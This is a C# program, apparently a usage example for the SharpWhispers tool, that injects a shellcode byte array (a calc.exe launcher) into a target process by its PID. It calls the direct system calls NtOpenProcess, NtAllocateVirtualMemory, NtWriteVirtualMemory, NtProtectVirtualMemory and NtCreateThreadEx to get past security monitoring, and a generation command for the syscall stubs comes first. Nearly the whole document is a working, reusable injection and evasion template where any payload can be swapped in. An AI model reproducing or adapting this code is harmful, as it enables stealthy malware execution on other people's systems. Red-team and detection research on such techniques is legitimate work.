Process injection using NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory and NtCreateThreadEx direct system calls.
python3 SharpWhispers.py -f NtOpenProcess,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtCreateThreadEx -o SharpWhispersFollow the instructions in Usage
using System;
using Data = SharpWhispers.Data;
using Syscall = Syscalls.Syscalls;
namespace BasicProcessInjection
{
class Program
{
//calc-thread64
public static byte[] Shellcode = new byte[]{
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,
0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,
0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,
0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,
0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,
0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,
0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
};
static void Main(string[] args)
{
uint pid;
IntPtr HProc;
try
{
pid = (uint)int.Parse(args[0]);
Console.WriteLine("Injecting into process with PID {0}...", pid);
}
catch
{
Console.WriteLine("Injecting into myself..");
pid = 0;
}
byte[] Sh = Shellcode;
IntPtr ShellcodeSize = (IntPtr)Shellcode.Length;
/* Open process */
if(pid != 0)
{
Console.WriteLine("=== Opening process with PID {0}.. ===", pid);
HProc = Syscall.NtOpenProcess(pid, Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS);
}
else
{
// Local Process
HProc = (IntPtr)(-1);
}
/* Allocate */
Console.WriteLine("");
Console.WriteLine("==== Allocating Memory ====");
IntPtr BaseAddress = IntPtr.Zero;
IntPtr AllocationSize = ShellcodeSize;
Data.Native.NTSTATUS retValue = Syscall.NtAllocateVirtualMemory(
HProc, ref BaseAddress, IntPtr.Zero, ref AllocationSize,
Data.Win32.Kernel32.MEM_COMMIT | Data.Win32.Kernel32.MEM_RESERVE,
Data.Win32.WinNT.PAGE_READWRITE);
if (retValue != Data.Native.NTSTATUS.Success)
{
Console.WriteLine("Error Allocating memory!");
Console.WriteLine("[*] Return Value : " + retValue);
return;
}
Console.WriteLine("[*] Allocated : " + AllocationSize + " bytes");
Console.WriteLine("[>] Allocation Address : " + string.Format("{0:X}", BaseAddress.ToInt64()) + "\n");
/* Write Memory */
Console.WriteLine("");
Console.WriteLine("==== Writing Shellcode in the Remote Process.. ====");
// Get Pointer to local shellcode
IntPtr Shellcodeptr = IntPtr.Zero;
unsafe
{
fixed(byte * p = Shellcode)
{
Shellcodeptr = (IntPtr)p;
}
}
uint res = 0;
res = Syscall.NtWriteVirtualMemory(HProc, BaseAddress, Shellcodeptr, (uint)ShellcodeSize);
if (res != (uint)ShellcodeSize)
{
Console.WriteLine("Error Writing memory!");
Console.WriteLine("[*] Return Value : " + res);
return;
}
/* Protect Memory - RX */
Console.WriteLine("");
Console.WriteLine("==== Setting Memory to RX.. ====");
// NtProtectVirtualMemory will change the protection of the whole page
// The value of AllocationSize will be overwritten
AllocationSize = ShellcodeSize;
IntPtr ProtectAddress = BaseAddress;
Syscall.NtProtectVirtualMemory(HProc, ref ProtectAddress, ref AllocationSize, Data.Win32.WinNT.PAGE_EXECUTE_READ);
/* RUN */
// Execute
Console.WriteLine("");
Console.WriteLine("==== Creating Thread.. ====");
IntPtr HThread = IntPtr.Zero;
res = (uint)Syscall.NtCreateThreadEx(ref HThread, Data.Win32.WinNT.ACCESS_MASK.GENERIC_ALL, (IntPtr)0, HProc, BaseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
Console.WriteLine("");
Console.WriteLine("Press any key to exit..");
Console.ReadLine();
}
}
}